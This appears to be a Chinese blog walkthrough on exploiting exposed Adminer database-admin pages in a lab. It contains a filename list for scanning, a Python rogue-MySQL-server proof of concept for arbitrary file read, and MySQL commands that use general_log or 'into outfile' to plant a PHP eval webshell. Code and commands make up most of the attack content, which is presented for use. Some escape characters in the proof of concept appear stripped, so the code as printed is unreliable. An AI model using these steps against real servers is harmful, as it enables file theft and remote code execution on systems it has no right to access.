Adminer 简单的利用

2020-10-10 14:24:44 浏览数 (1)
  • 攻击机:192.168.1.101
  • 靶机:192.168.1.105

扫描目录

默认文件名:adminer.php

一些版本的文件名

代码语言:javascript复制
adminer.php
sql.php
adminer-4.7.7.php
adminer-4.7.6.php
adminer-4.7.5.php
adminer-4.7.4.php
adminer-4.7.3.php
adminer-4.7.2.php
adminer-4.7.1.php
adminer-4.7.0.php
adminer-4.6.3.php
adminer-4.6.2.php
adminer-4.6.1.php
adminer-4.6.0.php
adminer-4.5.0.php
adminer-4.4.0.php
adminer-4.3.1.php
adminer-4.3.0.php
adminer-4.2.5.php
adminer-4.2.1.php
adminer-4.2.0.php
adminer-4.1.0.php
adminer-4.0.3.php
adminer-4.0.2.php
adminer-4.0.1.php
adminer-4.0.0.php
adminer-3.7.1.php
adminer-3.7.0.php
adminer-3.6.4.php
adminer-3.6.3.php
adminer-3.6.2.php
adminer-3.6.1.php
adminer-3.6.0.php
adminer-3.5.1.php
adminer-3.5.0.php
adminer-3.4.0.php
adminer-3.3.4.php
adminer-3.3.3.php
adminer-3.3.2.php
adminer-3.3.1.php
adminer-3.3.0.php
adminer-3.2.2.php
adminer-3.2.0.php
adminer-3.1.0.php
adminer-3.0.1.php
adminer-3.0.0.php

任意文件读取

利用一:

adminer低版本可以利用mysql服务端恶意读取客户端文件:https://xz.aliyun.com/t/8309

POC

代码语言:javascript复制
#coding=utf-8
import socket
import logging
import sys
logging.basicConfig(level=logging.DEBUG)

filename=sys.argv[1]
sv=socket.socket()
sv.setsockopt(1,2,1)
sv.bind(("",3306))
sv.listen(5)
conn,address=sv.accept()
logging.info('Conn from: %r', address)
conn.sendall("x4ax00x00x00x0ax35x2ex35x2ex35x33x00x17x00x00x00x6ex7ax3bx54x76x73x61x6ax00xffxf7x21x02x00x0fx80x15x00x00x00x00x00x00x00x00x00x00x70x76x21x3dx50x5cx5ax32x2ax7ax49x3fx00x6dx79x73x71x6cx5fx6ex61x74x69x76x65x5fx70x61x73x73x77x6fx72x64x00")
conn.recv(9999)
logging.info("auth okay")
conn.sendall("x07x00x00x02x00x00x00x02x00x00x00")
conn.recv(9999)
logging.info("want file...")
wantfile=chr(len(filename) 1) "x00x00x01xFB" filename
conn.sendall(wantfile)
content=conn.recv(9999)
logging.info(content)
conn.close()

随意登录,报错得到绝对路径

攻击机执行命令准备读取文件:

代码语言:javascript复制
python poc.py "C:phpstudy_proWWW1.php"

输入服务器地址,账号密码随意,点击登录

成功读取到文件内容

利用二:

攻击机新建库和表,开启外连

代码语言:javascript复制
create database adminer;

use adminer;

create table test(text text(4096));

访问靶机,输入攻击机的数据库信息

靶机需要 secure_file_priv 为空,为 null 导出不了

执行命令

代码语言:javascript复制
load data local infile "C:\phpstudy_pro\WWW\1.php" into table test FIELDS TERMINATED BY 'n';

查看表信息,成功读取到文件

getshell

通过日志getshell
代码语言:javascript复制
show variables like '%general%';                #查看配置信息

set global general_log=on                       #开启general log模式

set global general_log_file='C:\phpstudy_pro\WWW\shell.php';

select "<?php @eval($_POST['1']);?>";

连接 webshell

导出 getshell
代码语言:javascript复制
select 0x3c3f70687020406576616c28245f504f53545b315d293b3f3e into outfile "C:\phpstudy_pro\WWW\1.php";
php file mysql null 登录

0 人点赞